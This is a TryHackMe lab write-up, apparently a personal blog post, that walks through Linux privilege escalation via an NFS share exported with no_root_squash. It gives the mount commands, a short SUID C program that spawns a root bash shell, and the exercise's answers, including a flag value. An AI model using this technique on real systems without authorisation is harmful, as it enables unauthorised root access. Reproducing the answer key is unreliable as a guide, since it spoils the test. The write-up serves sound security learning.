TryHackMe - Linux Privilege Escalation: NFS

TryHackMe - Linux Privilege Escalation: NFS

This article discusses the solution for TryHackMe's Linux Privilege Escalation SUID task so proceed with caution.

I would suggest that you try to solve it on your own as you will learn a lot in the process of attempting. Try to give it your all until you feel that you are really hopelessly stuck.

Privilege Escalation: NFS (Network File Sharing) Solution

Notes:

  • SSH and Telnet can be used for root access.

    • Can find SSH private key in target system to connect with root privilege
  • Misconfigured network shell.

    • can be present when network backup exist.
  • NFS configuration in /etc/exports/

    • Look for no_root_squash on writable share as will allow creation of executable with SUID bit set and execute on target system.

      • By default NFS will remove root privileges from any file by changing root user to nfsnobody.

How many mountable shares can you identify on the target system?

  1. Run the following command in attacke machine:

     showmount -e {target_machine ip}
    

Screenshot 2024-02-10 at 12 26 51 AM

Answer: 3

How many shares have the "no_root_squash" option enabled?

  1. Run cat /etc/exports on the target machine

    Screenshot 2024-02-10 at 12 29 08 AM

Answer: 3

What is the content of the flag7.txt file?

  1. Let's mount one of the mountable shares by executing the following on attack machine:
mkdir /tmp/backupsharemounted
mount -o rw 10.10.139.175:/home/ubuntu/sharedfolder /tmp/backupsharemounted
cd /tmp/backupsharemounted
touch attack.c
  1. Let's update attack.c to execute bin/bash on the attack machine.
int main()
{setgid(0);
setuid(0);
system("/bin/bash");
return 0;
}
  1. Execute the following on the attack machine
gcc attack.c -o attack -w
chmod +s attack
  1. On target machine cd /home/ubuntu/sharedfolder and you will see the attack executable file.

Screenshot 2024-02-10 at 1 10 50 AM

  1. Execute ./attack on the target machine and this will provide us with bash root privileges.

Screenshot 2024-02-10 at 1 13 43 AM

  1. Run cat /home/matt/flag7.txt on the target machine

Screenshot 2024-02-10 at 1 16 01 AM

Answer:THM-89384012

Until next time. Keep learning.

Stay stoked and code. :)


I hope you can voluntarily Buy Me A Coffeei f you found this article useful and give additional support for me to continue sharing more content for the community. :)

Thank you very much. :)